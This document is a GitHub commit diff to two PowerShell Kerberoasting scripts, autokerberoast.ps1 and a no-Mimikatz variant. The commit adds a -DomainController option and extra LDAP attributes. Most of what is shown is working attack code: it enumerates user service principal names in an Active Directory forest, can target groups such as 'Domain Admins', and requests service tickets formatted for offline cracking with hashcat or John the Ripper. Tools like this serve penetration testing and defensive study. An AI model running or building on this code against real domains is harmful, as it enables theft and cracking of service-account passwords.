added -DomainController option to redirect search queries to specifie…

…d DC
xan7r · Jul 22, 2017 · 40887ff · 40887ff
1 parent 528de60
commit 40887ff
Show file tree

Hide file tree

Showing 2 changed files with 104 additions and 68 deletions.
diff --git a/autokerberoast.ps1 b/autokerberoast.ps1
@@ -43,6 +43,10 @@ function List-UserSPNs
   .PARAMETER GroupName
     This paremeter will only return SPNs that use users in a specific group, e.g. "Domain Admins"
 
+  .PARAMETER DomainController
+    This will redirect queries to a specific Domain Controller.  This is especially useful when environment doesn't use a DC for DNS resolutions.
+    NOTE: this will only return TGS Tickets from that DC's Domain, instead of the entire forest.
+
   .PARAMETER ViewAll
     Switch that displays ALL SPNs, even if they are protected by the same user.  
     Default is to only show 1 SPN per user account (e.g. if two MSSQL SPNs are registered to the user sqlAdmin, it will only request a ticket for the first service)
@@ -54,6 +58,7 @@ function List-UserSPNs
     PS C:\> List-UserSPNS
     PS C:\> List-UserSPNS -GroupName "Domain Admins"
     PS C:\> List-UserSPNS -Domain dev.testlab.local
+    PS C:\> List-UserSPNS -DomainController 172.20.200.100 
 #>
 
   [CmdletBinding()]
@@ -64,6 +69,9 @@ function List-UserSPNs
     [Parameter(Mandatory=$False)]
     [string]$GroupName = "",
 
+    [Parameter(Mandatory=$False)]
+    [string]$DomainController = "",
+
     [Parameter(Mandatory=$False)]
     [switch]$ViewAll,
 
@@ -75,10 +83,14 @@ function List-UserSPNs
 
   $GCs = @()
 
-  If ( $Domain ) 
+  if ( $DomainController ) 
   {
-    $GCs += $Domain
+    $GCs += $DomainController
   }
+  elseif ( $Domain )
+  {
+    $GCs += $Domain
+  }    
   else # find them
   { 
     # This code for identifying domains in current forest was Copied directly from Powerview's Get-ForestDomain Function, found at https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
@@ -126,14 +138,14 @@ function List-UserSPNs
   name                           {sqlengine}
   whenchanged                    {9/22/2014 6:45:21 AM}
   badpasswordtime                {0}
-  dscorepropagationdata          {4/4/2014 2:16:44 AM, 4/4/2014 12:58:27 AM, 4/4/2014 12:37:04 AM,...
+  dscorepropagationdata          {4/4/2014 2:16:44 AM, 4/4/2014 12:58:27 AM, 4/4/2014 12:37:04 AM,...}
   lastlogontimestamp             {130558419213902030}
   lastlogoff                     {0}
   objectclass                    {top, person, organizationalPerson, user}
   countrycode                    {0}
   cn                             {sqlengine}
   whencreated                    {4/4/2014 12:37:04 AM}
-  objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 191 250 179 30 180 59 104 26 248 205 17...
+  objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 191 250 179 30 180 59 104 26 248 205 17...}
   objectguid                     {101 165 206 61 61 201 88 69 132 246 108 227 231 47 109 102}
   objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=medin,DC=local}
   usncreated                     {57551}
@@ -144,16 +156,17 @@ function List-UserSPNs
   ForEach ( $GC in $GCs ) 
   {
   	$searcher = New-Object System.DirectoryServices.DirectorySearcher
-  	$searcher.SearchRoot = "LDAP://" + $GC
+    $searcher.SearchRoot = "LDAP://" + $GC
   	$searcher.PageSize = 1000
   	$searcher.Filter = "(&(!objectClass=computer)(servicePrincipalName=*))"
-  	$searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
-  	$searcher.PropertiesToLoad.Add("name") | Out-Null
-  	$searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
+    $searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
+    $searcher.PropertiesToLoad.Add("name") | Out-Null
+    $searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
     $searcher.PropertiesToLoad.Add("memberof") | Out-Null
     $searcher.PropertiesToLoad.Add("distinguishedname") | Out-Null
-  	#$searcher.PropertiesToLoad.Add("displayname") | Out-Null
-  	#$searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
+    $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
+    $searcher.PropertiesToLoad.Add("whencreated") | Out-Null
+    $searcher.PropertiesToLoad.Add("samaccountname") | Out-Null
 
   	$searcher.SearchScope = "Subtree"
   	$results = $searcher.FindAll()
@@ -182,11 +195,12 @@ function List-UserSPNs
           Select-Object -InputObject $result -Property `
           @{Name="SPN"; Expression={$spn.ToString()} }, `
           @{Name="Name";                 Expression={$result.Properties["name"][0].ToString()} }, `
+          @{Name="SamAccountName";       Expression={$result.Properties["samaccountname"][0].ToString()} }, `
           @{Name="UserPrincipalName";    Expression={$result.Properties["userprincipalname"][0].ToString()} }, `
           @{Name="DistinguishedName";    Expression={$distingName} }, `
-          @{Name="MemberOf";             Expression={$groups} } #, 
-          #@{Name="DisplayName";          Expression={$result.Properties["displayname"][0].ToString()} }, `            
-          #@{Name="PasswordLastSet";      Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} }
+          @{Name="MemberOf";             Expression={$groups} }, `
+          @{Name="PasswordLastSet";      Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} }, `
+          @{Name="whencreated";          Expression={$result.Properties["whencreated"][0].ToString()} } 
 
           if ( $Request )
           {
@@ -222,20 +236,29 @@ function Invoke-AutoKerberoast
     .PARAMETER SPN
         This paremeter will only request and process TGS ticket for single SPN.  Recommend running List-UserSPNs first to identify name of useful SPN.
 
+    .PARAMETER DomainController
+        This will redirect List-UserSPNs queries to a specific Domain Controller.  This is especially useful when environment doesn't use a DC for DNS resolutions.
+        NOTE: this will only return SPNs from that DC's Domain, instead of the entire forest.
+
+
     .EXAMPLE
-        PS C:\> List-UserSPNS
-        PS C:\> List-UserSPNS -GroupName "Domain Admins"
-        PS C:\> List-UserSPNS -Domain dev.testlab.local
-        PS C:\> List-UserSPNS -SPN MSSQLSvc/sqlBox.testlab.local:1433
+        PS C:\> Invoke-AutoKerberoast
+        PS C:\> Invoke-AutoKerberoast -GroupName "Domain Admins"
+        PS C:\> Invoke-AutoKerberoast -Domain dev.testlab.local
+        PS C:\> Invoke-AutoKerberoast -SPN MSSQLSvc/sqlBox.testlab.local:1433
+        PS C:\> Invoke-AutoKerberoast -DomainController 172.20.200.100 
 #>
 
     [CmdletBinding()]
     Param(
         [Parameter(Mandatory=$False)] 
-        [string]$GroupName="",
+        [string]$GroupName = "",
+
+        [Parameter(Mandatory=$False)]
+        [string]$Domain = "",
 
         [Parameter(Mandatory=$False)]
-        [string]$Domain="",
+        [string]$DomainController = "",
 
         [Parameter(Mandatory=$False)]
         [string]$SPN
@@ -260,7 +283,7 @@ function Invoke-AutoKerberoast
     }
     else
     {
-        $SPNs = List-UserSPNs -Request -Group $GroupName -Domain $Domain | Select SPN, DistinguishedName
+        $SPNs = List-UserSPNs -Request -Group $GroupName -Domain $Domain -DomainController $DomainController | Select SPN, DistinguishedName
         if ( ! $SPNs )
         {
             write-output "Unable to obtain any user account SPNs"

diff --git a/autokerberoast_noMimikatz.ps1 b/autokerberoast_noMimikatz.ps1
@@ -21,26 +21,27 @@
 function List-UserSPNs
 {
 <#
-.SYNOPSIS
-This function will List all SPNs that use User accounts.  The -Domain and -Group parameters can be used to limit your results.
+    .SYNOPSIS
+    This function will List all SPNs that use User accounts.  The -Domain and -Group parameters can be used to limit your results.
 
-.PARAMETER Domain
-This will only query the DC in a specified domain for SPNs that use User accounts.  Default is to query entire Forest.
+    .PARAMETER Domain
+    This will only query the DC in a specified domain for SPNs that use User accounts.  Default is to query entire Forest.
 
-.PARAMETER GroupName
-This paremeter will only return SPNs that use users in a specific group, e.g. "Domain Admins"
+    .PARAMETER GroupName
+    This paremeter will only return SPNs that use users in a specific group, e.g. "Domain Admins"
 
-.PARAMETER ViewAll
-Switch that displays ALL SPNs, even if they are protected by the same user.
-Default is to only show 1 SPN per user account (e.g. if two MSSQL SPNs are registered to the user sqlAdmin, it will only request a ticket for the first service)
+    .PARAMETER DomainController
+    This will redirect queries to a specific Domain Controller.  This is especially useful when environment doesn't use a DC for DNS resolutions.
+    NOTE: this will only return TGS Tickets from that DC's Domain, instead of the entire forest.
 
-.PARAMETER Request
-Switch to also request TGS tickets.  Default is only list available user SPNs.
+    .PARAMETER ViewAll
+    Switch that displays ALL SPNs, even if they are protected by the same user.
+    Default is to only show 1 SPN per user account (e.g. if two MSSQL SPNs are registered to the user sqlAdmin, it will only request a ticket for the first service)
 
-.EXAMPLE
-PS C:\> List-UserSPNS
-PS C:\> List-UserSPNS -GroupName "Domain Admins"
-PS C:\> List-UserSPNS -Domain dev.testlab.local
+    .EXAMPLE
+    PS C:\> List-UserSPNS
+    PS C:\> List-UserSPNS -GroupName "Domain Admins"
+    PS C:\> List-UserSPNS -Domain dev.testlab.local
 #>
 
     [CmdletBinding()]
@@ -51,6 +52,9 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
     [Parameter(Mandatory=$False)]
     [string]$GroupName = "",
 
+    [Parameter(Mandatory=$False)]
+    [string]$DomainController = "",
+
     [Parameter(Mandatory=$False)]
     [switch]$ViewAll
     )
@@ -59,7 +63,11 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
 
     $GCs = @()
 
-    If ( $Domain )
+    if ( $DomainController )
+    {
+        $GCs += $DomainController
+    }   
+    elseif ( $Domain )
     {
         $GCs += $Domain
     }
@@ -128,7 +136,7 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
     ForEach ( $GC in $GCs )
     {
     	$searcher = New-Object System.DirectoryServices.DirectorySearcher
-    	$searcher.SearchRoot = "LDAP://" + $GC
+        $searcher.SearchRoot = "LDAP://" + $GC
     	$searcher.PageSize = 1000
     	$searcher.Filter = "(&(!objectClass=computer)(servicePrincipalName=*))"
     	$searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
@@ -139,8 +147,6 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
         $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
         $searcher.PropertiesToLoad.Add("whencreated") | Out-Null
         $searcher.PropertiesToLoad.Add("samaccountname") | Out-Null
-    	#$searcher.PropertiesToLoad.Add("displayname") | Out-Null
-    	#$searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
 
     	$searcher.SearchScope = "Subtree"
     	$results = $searcher.FindAll()
@@ -174,8 +180,7 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
                     @{Name="DistinguishedName";    Expression={$distingName} }, `
                     @{Name="MemberOf";             Expression={$groups} }, `
                     @{Name="PasswordLastSet";      Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} }, `
-                    @{Name="whencreated";          Expression={$result.Properties["whencreated"][0].ToString()} } #, `
-                    #@{Name="DisplayName";          Expression={$result.Properties["displayname"][0].ToString()} },
+                    @{Name="whencreated";          Expression={$result.Properties["whencreated"][0].ToString()} } 
                 }
             }
     	}
@@ -185,45 +190,53 @@ PS C:\> List-UserSPNS -Domain dev.testlab.local
 function Invoke-AutoKerberoast
 {
 <#
-.SYNOPSIS
-This function automatically requests and display TGS tickets in a hashcat-compatible format.  The -Domain and -GroupName parameters can be used to execute targeted queries.
-
-.PARAMETER Domain
-This will only query the DC in a specified domain for SPNs that use User accounts.  Default is to query entire Forest.
-
-.PARAMETER GroupName
-This paremeter will only return SPNs that use users in a specific group, e.g. "Domain Admins", or simply "admin" (wildcards will be automatically added to both sides of groupname).
-
-.PARAMETER SPN
-This paremeter will request and process TGS tickets for an array of SPNs (a single SPN record may also be specified).  Recommend running List-UserSPNs first to identify name of useful SPNs.
-
-.PARAMETER HashFormat
-Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat style hash formatting.
-Defaults to 'Hashcat'.
-
-.EXAMPLE
-PS C:\> List-UserSPNS
-PS C:\> List-UserSPNS -GroupName "Domain Admins"
-PS C:\> List-UserSPNS -GroupName "Domain Admins" -Domain dev.testlab.local
-PS C:\> List-UserSPNS -GroupName "Domain Admins" -Domain dev.testlab.local -HashFormat John
-PS C:\> List-UserSPNS -SPN "MSSQLSvc/sqlBox.testlab.local:1433"
-PS C:\> List-UserSPNS -SPN @("MSSQLSvc/sqlBox.testlab.local:1433","MSSQLSvc/sqlBox2.dev.testlab.local:1433")
+    .SYNOPSIS
+    This function automatically requests and display TGS tickets in a hashcat-compatible format.  The -Domain and -GroupName parameters can be used to execute targeted queries.
+
+    .PARAMETER Domain
+    This will only query the DC in a specified domain for SPNs that use User accounts.  Default is to query entire Forest.
+
+    .PARAMETER GroupName
+    This paremeter will only return SPNs that use users in a specific group, e.g. "Domain Admins", or simply "admin" (wildcards will be automatically added to both sides of groupname).
+
+    .PARAMETER SPN
+    This paremeter will request and process TGS tickets for an array of SPNs (a single SPN record may also be specified).  Recommend running List-UserSPNs first to identify name of useful SPNs.
+
+    .PARAMETER DomainController
+    This will redirect List-UserSPNs queries to a specific Domain Controller.  This is especially useful when environment doesn't use a DC for DNS resolutions.
+    NOTE: this will only return SPNs from that DC's Domain, instead of the entire forest.
+
+    .PARAMETER HashFormat
+    Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat style hash formatting.
+    Defaults to 'Hashcat'.
+
+    .EXAMPLE
+    PS C:\> Invoke-AutoKerberoast
+    PS C:\> Invoke-AutoKerberoast -GroupName "Domain Admins"
+    PS C:\> Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain dev.testlab.local
+    PS C:\> Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain dev.testlab.local -HashFormat John
+    PS C:\> Invoke-AutoKerberoast -SPN "MSSQLSvc/sqlBox.testlab.local:1433"
+    PS C:\> Invoke-AutoKerberoast -SPN @("MSSQLSvc/sqlBox.testlab.local:1433","MSSQLSvc/sqlBox2.dev.testlab.local:1433")
+    PS C:\> Invoke-AutoKerberoast -DomainController 172.20.200.100
 #>
 
     [CmdletBinding()]
     Param(
         [Parameter(Mandatory=$False)]
-        [string]$GroupName="",
+        [string]$GroupName = "",
+
+        [Parameter(Mandatory=$False)]
+        [string]$Domain = "",
 
         [Parameter(Mandatory=$False)]
-        [string]$Domain="",
+        [string]$DomainController = "",
 
         [Parameter(Mandatory=$False)]
         [string[]]$SPN,
 
         [ValidateSet('John', 'Hashcat')]
         [Alias('Format')]
-        [String]$HashFormat='Hashcat',
+        [String]$HashFormat = "Hashcat",
 
         [Parameter(Mandatory=$False)]
         [Switch]$Mask
@@ -250,7 +263,7 @@ PS C:\> List-UserSPNS -SPN @("MSSQLSvc/sqlBox.testlab.local:1433","MSSQLSvc/sqlB
     }
     else
     {
-        $SPNs = List-UserSPNs -Group $GroupName -Domain $Domain | Select SPN, SamAccountName, DistinguishedName
+        $SPNs = List-UserSPNs -Group $GroupName -Domain $Domain -DomainController $DomainController | Select SPN, SamAccountName, DistinguishedName
 
         if ( ! $SPNs )
         {